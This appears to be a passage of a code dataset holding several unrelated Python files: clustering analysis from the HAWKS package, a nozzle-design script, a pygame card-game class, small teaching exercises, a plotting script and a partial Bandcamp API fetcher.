        cluster_subset (list, optional): A list of clustering algorithms to use. Defaults to None, where all default clustering algorithms (specified in :func:`~hawks.analysis.define_cluster_algs`) are used.
        feature_subset (list, optional): A list of problem features to use. Defaults to None, where all problem features (specified in :mod:`~hawks.problem_features`) are used.
        seed (int, optional): Random seed number. Defaults to None, where it is randomly selected.
        source (str, optional): Name of the set of datasets. Useful for organizing/analyzing/plotting results. Defaults to "HAWKS".
        prev_df (:py:class:`~pandas.DataFrame`, optional): Pass in a previous DataFrame, with which the results are added to. Defaults to None, creating a blank DataFrame.
        clustering (bool, optional): Whether to run clustering algorithms on the datasets or not. Defaults to True.
        feature_space (bool, optional): Whether to run the problem features on the datasets or not. Defaults to True.
        save (bool, optional): Whether to save the results or not. Defaults to True.
        save_folder (str, :class:`pathlib.Path`, optional): Where to save the results. Defaults to None, where the location of the :class:`~hawks.generator.BaseGenerator` is used. If no :class:`~hawks.generator.BaseGenerator` instance was given, create a folder in the working directory.
        filename (str, optional): Name of the CSV file to be saved. Defaults to "dataset_analysis".

    Returns:
        (tuple): 2-element tuple containing:
            :py:class:`~pandas.DataFrame`: DataFrame with results for each dataset.
            :py:class:`pathlib.Path`: The path to the folder where the results are saved.
    """
    if clustering is False and feature_space is False:
        raise ValueError("At least one of `clustering` or `feature_space` must be selected, otherwise there is nothing to do")
    # Extract the datasets
    datasets, label_sets, config_nums = extract_datasets(
        generator=generator,
        datasets=datasets,
        label_sets=label_sets
    )
    # Setup the save folder
    if save or save_folder is not None:
        base_folder = setup_folder(save_folder, generator)
        # If a path is given for the save folder, assume saving is wanted
        save = True
    else:
        base_folder = None
    # Initialize the dataframe
    df = pd.DataFrame()
    # Provided seed has priority, then seed from generator
    if seed is None and generator is not None:
        seed = generator.seed_num
    # Otherwise random seed, but raise warning due to unreliable reproducibility
    elif seed is None and generator is None:
        seed = np.random.randint(100)
        warnings.warn(
            message=f"No seed was provided, using {seed} instead",
            category=UserWarning
        )
    # Setup and run feature space functions
    if feature_space:
        # Get the functions from problem_features.py (not imported)
        feature_funcs = dict(
            [func_tup for func_tup in inspect.getmembers(hawks.problem_features, inspect.isfunction) if func_tup[1].__module__ == "hawks.problem_features"]
        )
        # If a feature subset has been given, remove those functions
        if feature_subset is not None:
            feature_dict = {}
            for feature_name in feature_subset:
                try:
                    feature_dict[feature_name] = feature_funcs[feature_name]
                except KeyError as e:
                    raise Exception(f"{feature_name} cannot be found, must be in: {feature_funcs.keys()}") from e
        else:
            feature_dict = feature_funcs
        feature_df = run_feature_space(datasets, label_sets, config_nums, feature_dict, df, source)
    # Setup and run clustering algorithms
    if clustering:
        # Get the defined clustering algs
        cluster_algs = define_cluster_algs(seed)
        # If a subset of algorithms is given, then select only those
        if cluster_subset is not None:
            alg_dict = {}
            for alg_name in cluster_subset:
                try:
                    alg_dict[alg_name] = cluster_algs[alg_name]
                except KeyError as e:
                    raise Exception(f"{alg_name} cannot be found, must be in: {cluster_algs.keys()}") from e
        else:
            alg_dict = cluster_algs
        # Run the clustering algorithms
        cluster_df = run_clustering(datasets, label_sets, config_nums, alg_dict, df, source)
    # Join the dataframes if need be
    if feature_space and clustering:
        # Need to merge on source and dataset number
        # Use concat to handle when config_num may be undefined (rather than pd.merge)
        final_df = pd.concat([cluster_df, feature_df], axis=1)
        final_df = final_df.loc[:, ~final_df.columns.duplicated()]
    elif feature_space:
        final_df = feature_df
    elif clustering:
        final_df = cluster_df
    if prev_df is not None:
        # FIX: `DataFrame.append` was deprecated in pandas 1.4 and removed in
        # pandas 2.0; pd.concat is the drop-in replacement here.
        final_df = pd.concat(
            [prev_df, final_df],
            ignore_index=True,
            sort=False
        )
    # Save the full dataframe
    if save:
        base_folder.mkdir(parents=True, exist_ok=True)
        hawks.utils.df_to_csv(
            df=final_df,
            path=base_folder,
            filename=filename
        )
    return final_df, base_folder
def run_clustering(datasets, label_sets, config_nums, alg_dict, df, source):
    """Function to actually run the clustering algorithms and add results to the DataFrame.

    Args:
        datasets (list): A list of the datasets to be examined.
        label_sets (list): A list of labels that match the list of datasets.
        config_nums (list): A list of the config numbers (only relevant for HAWKS, not external datasets). Allows linking of datasets to parameter configuration.
        alg_dict (dict): Dictionary of the clustering algorithms. Defined in :func:`~hawks.analysis.define_cluster_algs`.
        df (:py:class:`~pandas.DataFrame`): DataFrame to add the results to.
        source (str): Name of the set of datasets.

    Returns:
        :py:class:`~pandas.DataFrame`: DataFrame with the clustering results.
    """
    # Loop over the datasets
    for dataset_num, (data, labels, config_num) in enumerate(zip_longest(datasets, label_sets, config_nums)):
        # Create the defaultdict
        res_dict = defaultdict(list)
        # Add the constants to the dict
        res_dict["source"].append(source)
        res_dict["config_num"].append(config_num)
        res_dict["dataset_num"].append(dataset_num)
        # Add some extra general info about the dataset here
        res_dict["num_examples"].append(int(data.shape[0]))
        res_dict["num_clusters"].append(int(np.unique(labels).shape[0]))
        # Loop over the dict of clustering algorithms
        for name, d in alg_dict.items():
            # Add in the number of clusters
            d["kwargs"] = determine_num_clusters(name, d["kwargs"], d["k_multiplier"], labels)
            # Increment the seed to avoid pattern in datasets
            if "random_state" in d["kwargs"]:
                d["kwargs"]["random_state"] += 1
            # Pass the kwargs to the relevant algorithm class
            alg = d["class"](**d["kwargs"])
            # Run the algorithm
            alg.fit(data)
            # Predict labels and compare if we have the truth
            if labels is not None:
                # Obtain labels for this algorithm on this dataset
                if hasattr(alg, "labels_"):
                    # FIX: `np.int` (a deprecated alias of the builtin int) was
                    # removed in NumPy 1.24; use the builtin directly.
                    labels_pred = alg.labels_.astype(int)
                else:
                    labels_pred = alg.predict(data)
                ari_score = adjusted_rand_score(labels, labels_pred)
            # No labels, so just set scores to NaN
            else:
                ari_score = np.nan
            # Add the cluster name and scores
            res_dict[f"c_{name}"].append(ari_score)
        # Calculate evaluation metrics and add to df
        # FIX: `DataFrame.append` was removed in pandas 2.0; pd.concat is the
        # supported equivalent (still not particularly efficient per-row).
        df = pd.concat(
            [df, pd.DataFrame.from_dict(res_dict)],
            ignore_index=True,
            sort=False
        )
    return df
def run_feature_space(datasets, label_sets, config_nums, feature_dict, df, source):
    """Function to actually run the problem features on the datasets and add results to the DataFrame.

    Args:
        datasets (list): A list of the datasets to be examined.
        label_sets (list): A list of labels that match the list of datasets.
        config_nums (list): A list of the config numbers (only relevant for HAWKS, not external datasets). Allows linking of datasets to parameter configuration.
        feature_dict (dict): Dictionary of the problem features to be used.
        df (:py:class:`~pandas.DataFrame`): DataFrame to add the results to.
        source (str): Name of the set of datasets.

    Returns:
        :py:class:`~pandas.DataFrame`: DataFrame with the problem feature results.
    """
    # Loop over the datasets
    for dataset_num, (data, labels, config_num) in enumerate(zip_longest(datasets, label_sets, config_nums)):
        # Create the defaultdict
        res_dict = defaultdict(list)
        # Add the constants to the dict
        res_dict["source"].append(source)
        res_dict["config_num"].append(config_num)
        res_dict["dataset_num"].append(dataset_num)
        # Add some extra general info about the dataset here
        res_dict["num_examples"].append(int(data.shape[0]))
        res_dict["num_clusters"].append(int(np.unique(labels).shape[0]))
        # Precomputation for problem features (assumes we always use all)
        precomp_dict = {
            "dists_sqeuclidean": squareform(pdist(data, metric="sqeuclidean"))
        }
        # precomp_dict["dists_euclidean"] = np.sqrt(precomp_dict["dists_sqeuclidean"])
        # Calculate the feature values for this problem/data
        for name, func in feature_dict.items():
            res_dict[f"f_{name}"].append(func(data, labels, precomp_dict))
        # Add to dataframe
        # FIX: `DataFrame.append` was removed in pandas 2.0; pd.concat is the
        # supported equivalent (still not particularly efficient per-row).
        df = pd.concat(
            [df, pd.DataFrame.from_dict(res_dict)],
            ignore_index=True,
            sort=False
        )
    return df
def determine_num_clusters(col_name, alg_kwargs, multiplier, labels):
    """Insert the cluster-count argument for one algorithm from the labels.

    This is not estimation: the true number of clusters is read off the
    labels and (optionally) scaled by ``multiplier`` before being written
    into ``alg_kwargs`` under sklearn's argument name for ``col_name``.

    Args:
        col_name (str): Name of the algorithm.
        alg_kwargs (dict): Arguments for the clustering algorithm (mutated).
        multiplier (float): Multiplier for the number of clusters (None -> 1).
        labels (list): The labels for this dataset (list or ndarray).

    Raises:
        KeyError: If the algorithm's kwargs have no cluster-count argument.

    Returns:
        dict: The algorithm's arguments with the cluster number added.
    """
    # sklearn's GMM names the parameter n_components rather than n_clusters.
    arg = "n_components" if col_name == "GMM" else "n_clusters"
    if arg not in alg_kwargs:
        raise KeyError(f"{arg} was not found in {col_name}'s kwargs: {alg_kwargs}")
    # True cluster count, scaled by the (optional) multiplier.
    true_k = np.unique(labels).shape[0]
    scale = 1 if multiplier is None else multiplier
    alg_kwargs[arg] = int(true_k * scale)
    return alg_kwargs
| true |
04a65818cb6f884008ced0ca49cb021455500bf1 | Python | xandhiller/learningPython | /boxPrint.py | UTF-8 | 757 | 4.03125 | 4 | [] | no_license | #! python3
# Purpose: Following through an example from the book.
# It aims to demonstrate the use of exceptions as a debugging method.
def boxPrint(symbol, width, height):
if len(symbol) != 1:
raise Exception('Symbol myst be a single character string.')
if width <= 2:
raise Exception('Width must be greater than 2.')
if height <= 2:
raise Exception('Height must be greater than 2.')
print (symbol * width)
for i in range(height - 2):
print(symbol + (' ' * (width -2)) + symbol)
print(symbol * width)
for sym, w, h in (('*', 4, 4), ('0', 20, 5), ('x', 1, 3), ('ZZ', 3, 3)):
try:
boxPrint(sym, w, h)
except Exception as err:
print('An exception has occurred: ' + str(err))
| true |
07a4fda00b58f1073a6d254dac9aea8c188532b5 | Python | MNahad/soton-nozzle | /MoC.py | UTF-8 | 6,304 | 3.328125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
"""
1. Lookup table for Argon (gamma=5/3) with:
Mach number M
Mach angle mu in degrees
Prandtl-Meyer function neu in degrees
from 1 <= M <= 3
2. Method of Characteristics table which produces geometry for
minimum length 2D symmetric nozzle using 4 characteristics
Author: Mohammed Nawabuddin
"""
import numpy as np # http://www.numpy.org/
import scipy.optimize as opt # https://scipy.org/
import math
# Set initial gamma, initial theta and desired Mach number
gamma = 5/3
Mdes = 2.7
initialTheta = 0.4
def mu(mach):
"""
Returns mu from Mach
"""
return math.asin(1 / mach) * (180 / math.pi)
def neu(mach):
"""
Returns neu from Mach
"""
return ((((gamma+1)/(gamma-1))**0.5) *
(math.atan2((((gamma-1)/(gamma+1))*((mach**2)-1))**0.5, 1)) -
math.atan2(((mach**2)-1)**0.5, 1)) * \
(180 / math.pi)
def _tanAlpha(prv, nxt):
"""
Called by coord()
"""
return math.tan(((prv + nxt)/2) * (math.pi/180))
def coord(xUpp, yUpp, xLow, yLow, angUpp, angLow, angSum, angDiff, isSym):
"""
Used in calculating nozzle geometry
"""
if isSym == 1:
xp = xUpp - ((yUpp)/(_tanAlpha(angUpp, angDiff)))
return [xp, 0]
if isSym == 0:
xp = (xUpp*_tanAlpha(angUpp, angDiff) - xLow*_tanAlpha(angLow, angSum) +
yLow - yUpp) / \
(_tanAlpha(angUpp, angDiff) - _tanAlpha(angLow, angSum))
yp = yLow + (xp - xLow)*_tanAlpha(angLow, angSum)
return [xp, yp]
def areaRatio(gamma, mach):
"""
Used for finding the area ratio at a set gamma and Mach number
"""
return (((2/(gamma+1))*(1+(((gamma-1)/2)*(mach**2)))) **
((gamma+1)/(2*(gamma-1)))) / \
mach
""" Create lookup table consisting of Mach numbers from 1.00 to
3.00, and their associated mu and neu angles. """
lookup = np.zeros((201, 3))
np.put(lookup, np.arange(0, 601, 3), np.arange(1.00, 3.01, 0.01))
for row in lookup:
row[1] = mu(row[0])
for row in lookup:
row[2] = neu(row[0])
# Save table
np.savetxt("outputs/lookup.csv", lookup, delimiter=',')
""" Create MoC table for fluid at the desired gamma and
at an exit velocity at the desired Mach number """
# Blank MoC table
MoC = np.zeros((18, 11))
# Add point IDs
for row in np.arange(4, 18):
MoC[row, 0] = row - 3
# Add initial info at throat
MoC[3, 3] = neu(Mdes)/2
MoC[0, 3] = initialTheta
MoC[1, 3] = ((MoC[3, 3] - MoC[0, 3]) / 3) + MoC[0, 3]
MoC[2, 3] = 2 * ((MoC[3, 3] - MoC[0, 3]) / 3) + MoC[0, 3]
# Fill in neu and Riemann for throat
for row in np.arange(4):
MoC[row, 4] = MoC[row, 3]
MoC[row, 2] = MoC[row, 3] + MoC[row, 4]
# Fill other points by iterating over characteristic lines
outerWaveIter = 3
for charac in np.array([[17, 2], [15, 3], [12, 4], [8, 5]]):
innerWaveIter = 4
for row in np.arange(charac[0], charac[0]-charac[1], -1):
MoC[row, 1] = MoC[outerWaveIter, 2]
if innerWaveIter < 4:
MoC[row, 2] = MoC[innerWaveIter, 2]
MoC[row, 3] = (MoC[row, 2] - MoC[row, 1]) / 2
MoC[row, 4] = (MoC[row, 2] + MoC[row, 1]) / 2
innerWaveIter -= 1
outerWaveIter -= 1
# Housekeeping
for row in np.array([8, 12, 15, 17]):
MoC[row, 3] = (MoC[row - 1, 2] - MoC[row - 1, 1]) / 2
MoC[row, 4] = (MoC[row - 1, 2] + MoC[row - 1, 1]) / 2
""" Find Mach from neu by searching for the optimum value using
the SciPy implementation of the van Wijngaarden-Deker-Brent
method. Find mu from Mach. Find theta+mu and theta-mu. """
for row in MoC:
row[5] = opt.brentq(lambda x: neu(x) - row[4], 1.00, 3.00)
row[6] = mu(row[5])
row[7] = row[3]+row[6]
row[8] = row[3]-row[6]
# Set initial x and y geometry for the throat to (0,1)
for row in np.arange(4):
MoC[row, 10] = 1
""" For each point in the nozzle, define its two other
significant points and a flag for the type of point. Then find
the x and y coordinates of that point
and insert into table. """
for point in np.array([[100, 4, 0, 0],
[4, 5, 1, 1],
[5, 6, 2, 1],
[6, 7, 3, 1],
[7, 8, 3, 2],
[100, 9, 5, 0],
[9, 10, 6, 1],
[10, 11, 7, 1],
[11, 12, 8, 2],
[100, 13, 10, 0],
[13, 14, 11, 1],
[14, 15, 12, 2],
[100, 16, 14, 0],
[16, 17, 15, 2]]):
if point[3] == 0:
MoC[point[1], 9], MoC[point[1], 10] = \
coord(MoC[point[2], 9], MoC[point[2], 10],
0, 0,
MoC[point[2], 8], 0,
0, MoC[point[1], 8], 1)
if point[3] == 1:
MoC[point[1], 9], MoC[point[1], 10] = \
coord(MoC[point[2], 9], MoC[point[2], 10],
MoC[point[0], 9], MoC[point[0], 10],
MoC[point[2], 8], MoC[point[0], 7],
MoC[point[1], 7], MoC[point[1], 8], 0)
if point[3] == 2:
MoC[point[1], 9], MoC[point[1], 10] = \
coord(MoC[point[2], 9], MoC[point[2], 10],
MoC[point[0], 9], MoC[point[0], 10],
MoC[point[2], 3], MoC[point[0], 7],
MoC[point[0], 7], MoC[point[0], 3], 0)
# Save the MoC table
np.savetxt("outputs/MoC.csv", MoC, delimiter=',')
# Compare nozzle geometry with quasi-1D nozzle theory
AXAStar = np.array([areaRatio(gamma, MoC[row, 5]) for row in [8, 12, 15, 17]])
ratioDiff = np.array([MoC[row, 10] for row in [8, 12, 15, 17]]) - AXAStar
# Print tables
print("LOOKUP")
for row in lookup:
print(row)
print("\n")
print("LEFT HALF OF MOC")
print(MoC[0:4, :5])
print(MoC[4:9, :5])
print(MoC[9:13, :5])
print(MoC[13:16, :5])
print(MoC[16:18, :5])
print("\n")
print("RIGHT HALF OF MOC")
print(MoC[0:4, 5:])
print(MoC[4:9, 5:])
print(MoC[9:13, 5:])
print(MoC[13:16, 5:])
print(MoC[16:18, 5:])
print("\n")
print("A/A* FOR MACH NUMBERS FOUND AT WALL POINTS")
for ratio in AXAStar:
print(ratio)
print("\n")
print("DIFFERENCE BETWEEN MOC AREA RATIO AND QUASI-1D AREA RATIO")
for diff in ratioDiff:
print(diff)
| true |
91734592aacaf904de64ad9c0f540c4510e5efec | Python | remithiebaut/Coinche | /GraphicHand.py | UTF-8 | 8,595 | 3 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 1 08:56:59 2019
@author: rthie
"""
import generical_function as generic
from GraphicCard import GraphicCard
from Hand import Hand
import graphic_constant as gconst
import pygame
import coinche_constant as const
import sys
class GraphicHand(Hand):
    """A Hand subclass that renders itself and interacts via pygame.

    Extends Hand with drawing (display), human/bot card selection
    (choose_card), an animated play step, and a colour filter that returns
    a GraphicHand rather than a plain list.
    """
    def display(self,screen,player):
        """
        Draw this hand's cards in the screen area reserved for `player`.

        Cards of "j2"/"j4" are drawn rotated (inverse); every player except
        "j1" (the human) has their cards drawn face down (hidden).
        """
        inverse=False
        hidden=False
        if( player == "j2" )or( player == "j4") :
            inverse=True
        if( player != "j1") :
            hidden=True
        i=0
        for card in self.cards:
            # One slot per card, taken from the layout table in graphic_constant.
            card.play(screen=screen,new_position=gconst.area["cards"][player][i],inverse=inverse,hidden=hidden)
            i+=1
        pygame.display.flip()
    def choose_card(self,random=True):
        """
        Choose and return a card from this hand.

        random=False: a human clicks a card with the mouse (ESC or closing
        the window quits the whole program).
        random=True: a bot picks via generic.decision(); only cards whose
        `rest` flag is True may be returned.
        """
        if not random : #Real player: poll pygame events until a playable card is clicked
            while True:
                event = pygame.event.poll()
                if event.type == pygame.QUIT or event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE: #escape key or window close -> quit
                    pygame.quit()
                    sys.exit()
                for card in self.cards:
                    mouse=pygame.mouse.get_pos()
                    # Hit-test: card.position is (x, y, width, height).
                    if mouse[0]>card.position[0] and mouse[0]<(card.position[0]+card.position[2]) and mouse[1]>card.position[1] and mouse[1]<(card.position[1]+card.position[3]):
                        if event.type == pygame.MOUSEBUTTONDOWN :
                            if card.rest:
                                pygame.display.flip()
                                return card
        else: #BOT: draw 1-based positions until a playable one comes up
            while True :
                card_position = generic.decision(liste_choix_possible=const.liste_entier32[:len(self.cards)], random=random, question="Quelle carte ? 1ère, 2ème ? ")
                card_position = int(card_position)-1
                if card_position<len(self.cards) :
                    if self.cards[card_position].rest:
                        return self.cards[card_position]
    def play(self,screen,player,random,pli,hand): # could not work // don't play an empty hand with bots
        """
        Play one card from `hand` onto the board (and into `pli`).

        When `screen` is given the move is animated: the hand is shown, the
        chosen card moves to the board slot, and the hand is redrawn.
        Returns the colour chosen via Hand.play_card().
        """
        if screen!=None :
            self.display(screen=screen,player=player)
            generic.wait_or_pass(1)
            screen.fill(gconst.GREEN,gconst.area[player])
            hand.display(screen=screen,player=player)
        card=hand.choose_card(random=random)
        choosen_color=self.play_card(pli=pli,choosen_card=card)
        if screen!=None :
            card.play(screen,new_position=gconst.area["cards"]["board"][player])
            self.display(screen=screen,player=player)
            generic.wait_or_pass(1)
        return choosen_color
    def color(self, chosen_color):
        """
        Return all the cards of the given colour, wrapped in a new
        GraphicHand named after that colour (not a plain list).
        """
        cards_of_this_color=[]
        for card in self.cards:
            if card.color==chosen_color:
                cards_of_this_color.append(card)
        return GraphicHand(cards=cards_of_this_color, name =chosen_color)
def test_graphic_hand():
    """Interactive smoke test for GraphicHand (not an automated unit test).

    Builds a hand of all carreau cards, opens a pygame window, and maps keys:
    UP plays a card, digits 1-6 highlight layout areas, 9 clears the screen,
    ESC or closing the window exits.
    """
    cards=[]
    i=0
    # One GraphicCard per rank, all of suit "carreau", laid out in player 1's slots.
    for numero in const.liste_numero :
        cards.append(GraphicCard(numero,"carreau", position=gconst.area["cards"]["j1"][i]))
        i+=1
    myhand=GraphicHand(name="Pli",cards=cards)
    mypli=GraphicHand(name="Pli",cards=[])
    pygame.init()
    screen=pygame.display.set_mode(gconst.screen_size)
    screen.fill(gconst.GREEN)
    pygame.display.flip()
    while True:
        event = pygame.event.poll()
        if event.type == pygame.QUIT or event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE: #escape or window close -> leave the loop
            break
        if event.type == pygame.KEYDOWN and event.key == pygame.K_UP :
            myhand.play(screen,player="j1",random=False,pli=mypli,hand=myhand)
        if event.type == pygame.KEYDOWN and event.key == pygame.K_1 :
            screen.fill(gconst.BLUE,gconst.area["j1"])
        if event.type == pygame.KEYDOWN and event.key == pygame.K_2 :
            screen.fill(gconst.BLUE,gconst.area["j2"])
        if event.type == pygame.KEYDOWN and event.key == pygame.K_3 :
            screen.fill(gconst.BLUE,gconst.area["j3"])
        if event.type == pygame.KEYDOWN and event.key == pygame.K_4 :
            screen.fill(gconst.BLUE,gconst.area["j4"])
        if event.type == pygame.KEYDOWN and event.key == pygame.K_5 :
            screen.fill(gconst.BLUE,gconst.area["middle"])
        if event.type == pygame.KEYDOWN and event.key == pygame.K_6 :
            screen.fill(gconst.BLUE,gconst.area["points"])
        #if event.type == pygame.KEYDOWN and event.key == pygame.K_7 :
        #    screen.fill(gconst.BLUE,gconst.area["test"])
        if event.type == pygame.KEYDOWN and event.key == pygame.K_9 :
            screen.fill(gconst.GREEN)
        pygame.display.flip()
    pygame.quit()
if __name__=="__main__" :
print("ini and color_sort test")
mycard1=GraphicCard("7","carreau")
mycard2=GraphicCard("7","coeur")
myhand2=GraphicHand(name="Pli",cards=[mycard2,mycard1])
assert(myhand2.name=="Pli")
assert(len(myhand2.cards)==2)
assert(myhand2.points==0)
assert(myhand2.rest["coeur"]==1)
assert(myhand2.rest["cards"]==2)
assert(myhand2.rest["pique"]==0)
assert(myhand2.rest["trefle"]==0)
assert(myhand2.rest["carreau"]==1)
assert(myhand2.cards[0].color=="coeur")
assert(myhand2.cards[1].color=="carreau")
assert(len(myhand2.rest)==5)
myhand=GraphicHand()
assert(myhand.name=="Cards")
assert(len(myhand.cards)==0)
assert(myhand.points==0)
for key in myhand.rest :
assert(myhand.rest[key]==0)
assert(len(myhand.rest)==5)
print("Test OK")
print("assert that test work correctly")
myhand2.test("Pli",1,0,1,0,0)
myhand.test()
print("Test OK")
print("add test")
myhand += myhand2
myhand.test(carreau=1,coeur=1)
print("Test OK")
print("reintialize test")
myhand2.test(name="Pli")
print("Test OK")
print("count_points test")
mycard1.points+=4
mycard2.points+=5
assert(myhand.count_points()==9==myhand.points)
assert(myhand2.count_points()==myhand2.points==0)
pioche =[ GraphicCard(i,j) for j in const.liste_couleur[:4] for i in const.liste_numero]
mypioche=GraphicHand(cards=pioche,name="pioche")
mypioche.test("pioche",8,8,8,8,0)
print("Test OK")
print("color test")
mycolor={}
for color in const.liste_couleur[:4]:
mycolor[color]=mypioche.color(color)
mycolor["coeur"].test(name="coeur",coeur=8)
mycolor["pique"].test(name="pique",pique=8)
mycolor["carreau"].test(name="carreau",carreau=8)
mycolor["trefle"].test(name="trefle",trefle=8)
print("Test OK")
print("remove test")
mypioche.cards[4].rest=False
mypioche.remove_cards()
mypioche.test("pioche",7,8,8,8)
mypioche.cards[4].rest=False
mypioche.cards[7].rest=False
mypioche.remove_cards()
mypioche.test("pioche",6,7,8,8)
print("Test OK")
print("choose test")
for i in range (100):
card=mypioche.choose_card()
assert(card.rest)
print("play_card test")
mycard3=GraphicCard("7","carreau")
mycard4=GraphicCard("7","coeur")
mycard5=GraphicCard("As","coeur")
mycard6=GraphicCard("R","pique")
myhand3=GraphicHand(cards=[mycard3,mycard4])
mypli=GraphicHand(name="Pli", cards=[mycard5,mycard6])
myhand3.play_card(pli=mypli, choosen_card=mycard3)
myhand3.test(coeur=1)
mypli.test("Pli",coeur=1,pique=1,carreau=1)
mypli.play_card(pli=myhand3, choosen_card=mycard3)
mypli.play_card(pli=myhand3, choosen_card=mycard5)
mypli.play_card(pli=myhand3, choosen_card=mycard6)
myhand3.test(coeur=2,pique=1,carreau=1)
mypli.test("Pli")
print("Test OK")
print("winner test")
aspique=GraphicCard("As","pique")
dpique=GraphicCard("D","pique")
septcoeur=GraphicCard("7","coeur")
mypli2=GraphicHand(name="Pli", sort=False, cards=[aspique,dpique,septcoeur])
"atout coeur"
septcoeur.atout=True
aspique.value=8
septcoeur.value=9
dpique.value=5
assert(mypli2.winner()==2)
"atout pique"
septcoeur.atout=False
aspique.atout=True
dpique.atout=True
aspique.value=14
septcoeur.value=1
dpique.value=11
assert(mypli2.winner()==0)
"no atout pique first"
septcoeur.atout=False
aspique.atout=False
dpique.atout=False
aspique.value=8
septcoeur.value=1
dpique.value=5
assert(mypli2.winner()==0)
"no atout coeur first"
mypli3=GraphicHand(name="Pli" ,sort=False, cards=[septcoeur,aspique,dpique])
aspique.value=8
septcoeur.value=1
dpique.value=5
assert(mypli3.winner()==0)
print("Test OK")
print("Check check_card")
myhand=GraphicHand(cards=[aspique,dpique])
assert(myhand.check_card(GraphicCard("As","pique")))
assert(myhand.check_card(GraphicCard("D","pique")))
assert(not myhand.check_card(GraphicCard("7","pique")))
assert(myhand.check_card(aspique))
assert(myhand.check_card(dpique))
print("Test OK")
print("graphic test")
test_graphic_hand()
print("No Test")
| true |
37219cce94ed43b4a64b7c0fe8c75ccc562ce7be | Python | Aasthaengg/IBMdataset | /Python_codes/p02410/s031440077.py | UTF-8 | 258 | 2.734375 | 3 | [] | no_license | n, m = [int(x) for x in input().split()]
a = [[int(x) for x in input().split()] for y in range(n)]
b = [int(input()) for x in range(m)]
c = [0 for i in range(n)]
for i in range(n):
c[i] = sum([a[i][x] * b[x] for x in range(m)])
for i in c:
print(i) | true |
b2705db8e82c063ce9441ae9e3473941021bc06f | Python | b4158813/my-python-journey | /2019 SUPT algorithm/hurricane_ball_slowspeed.py | UTF-8 | 1,744 | 2.625 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
plt.rcParams['font.sans-serif'] = ['SimHei'] # 正常显示汉字的操作
plt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号的操作
omega = [62.3641, 53.4739, 46.8021,41.6795, 46.7986, 50.4552, 54.4187, 60.8718, 55.9450, 45.3922,
46.8021, 43.1893, 62.8130, 44.1142, 50.0812, 48.8736, 51.4551]
theta_t = [76.989, 80.668, 84.864, 89.512, 84.867, 82.366, 80.192, 77.499, 79.472, 85.990, 84.864, 87.971, 76.842,
87.103, 82.597, 83.380, 81.771]
theta_r = [-76.2, -79.6, -85.2, -87.8, -83.4, -81.0, -78.7, -79.7, -81.1, -85.4, -85.9, -88.6, -79.1, -87.5, -81.1,
-84.7, -78.0]
theta_r = [76.2, 79.6, 85.2, 87.8, 83.4, 81.0, 78.7, 79.7, 81.1, 85.4, 85.9, 88.6, 79.1, 87.5, 81.1, 84.7, 78.0]
error = [-1.025, -1.324, 0.396, -1.913, 1.761, -1.677, -1.877, 2.825, 2.104, -0.671, 1.172, 0.702, 2.896, 0.464, -1.825,
1.579, -4.589]
# plt.bar(omega, theta_t, width=0.3)
# plt.bar(omega, theta_r, width=0.3, alpha=0.5)
plt.plot(omega, error, linestyle='--', marker='o', label='相对误差/%')
# plt.plot(omega, theta_r, marker='o', label='实际曲线')
# plt.plot(omega, theta_t, marker='x', label='理论曲线')
# for a,b in zip(omega,theta_t):
# plt.text(a, b, '%.3f' % b, ha='center', va='bottom', fontsize=15)
# for a, b in zip(omega, theta_r):
# plt.text(a, b, '%.1f' % -b , ha='center', va='bottom', fontsize=15)
for a, b in zip(omega, error):
plt.text(a, b, '%.3f' % b + '%', ha='center', va='bottom', fontsize=15)
plt.xlabel('角速度Ω/(rad/s)', fontsize=15)
plt.ylabel('θ/°', fontsize=15)
plt.tick_params(labelsize=15)
plt.legend(fontsize=15)
plt.show()
| true |
2e025762007638a58c2aa24c68c10095a7f9dd77 | Python | iuliaL/biomeetsinformatics | /Gauss.py | UTF-8 | 332 | 3.90625 | 4 | [] | no_license | # OFF TOPIC
# Summing Integers (to n) Problem
def RecursiveGauss(n):
if n == 0:
return 0
else:
return RecursiveGauss(n-1) + n
print(RecursiveGauss(5))
def GeniusGauss(n):
return n * (n + 1) // 2 # (I can use integer division since n is integer and either n or n+1 is even)
print(GeniusGauss(5))
| true |
3b470117466a88cd128a93d4671747f6940a0ab5 | Python | abbbi/getbandcamp | /getbandcamp.py | UTF-8 | 8,864 | 2.59375 | 3 | [] | no_license | #!/usr/bin/env python
import argparse
import json
import requests
from bs4 import BeautifulSoup
from urllib import quote_plus,unquote
from sys import exit
from os import mkdir, path, makedirs
from ID3 import *
# dont ask, google will help you
BC_API_KEY=""
# see: http://bandcamp.com/developer
BC_API_BANDID="http://api.bandcamp.com/api/band/3/search?key=" + BC_API_KEY + "&name="
BC_API_RECORDS="http://api.bandcamp.com/api/band/3/discography?key=" + BC_API_KEY + "&band_id="
BC_API_ALBUM="http://api.bandcamp.com/api/album/2/info?key=" + BC_API_KEY + "&album_id="
BC_API_TRACKS="http://api.bandcamp.com/api/track/3/info?key=" + BC_API_KEY + "&track_id="
def get_url(url):
try:
resp = requests.get(url=url)
if resp.status_code == requests.codes.ok:
data = resp.content
return data
else:
print "Error fetching page, error:" + str(resp.status_code)
exit(1)
except requests.ConnectionError, e:
print "Error fetching page:" + str(e)
exit(1)
except requests.HTTPError, e:
print "Error reading HTTP response:" + str(e)
def get_json(url, id):
get = url + id
data = get_url(get)
return json.loads(data)
def get_bandname(url):
data = get_url(url)
soup = BeautifulSoup(data)
proplist = soup.find('meta', {"property":'og:site_name', 'content':True})
if proplist:
return proplist['content']
else:
return False
def get_record_tracks(band_id):
data = get_json(BC_API_RECORDS, str(band_id))
record = { 'singles' : {} }
records = []
if data['discography']:
for disc in data['discography']:
if disc.has_key('album_id'):
records.append(disc['album_id'])
elif disc['track_id']:
trackinfo = get_json(BC_API_TRACKS, str(disc['track_id']))
record['singles'][trackinfo['title']] = {}
record['singles'][trackinfo['title']] = { 'url' : trackinfo['streaming_url'] }
#record = {}
for disc_id in records:
disc = get_json(BC_API_ALBUM, str(disc_id))
record[disc['title']] = {}
for track in disc['tracks']:
record[disc['title']][track['title']] = { 'number': track['number'] }
if 'streaming_url' in track:
record[disc['title']][track['title']]['url'] = track['streaming_url']
else:
record[disc['title']][track['title']]['url'] = False
return record
def trackinfo(record_tracks):
print "Found following singles:\n"
if len(record_tracks['singles']) > 0:
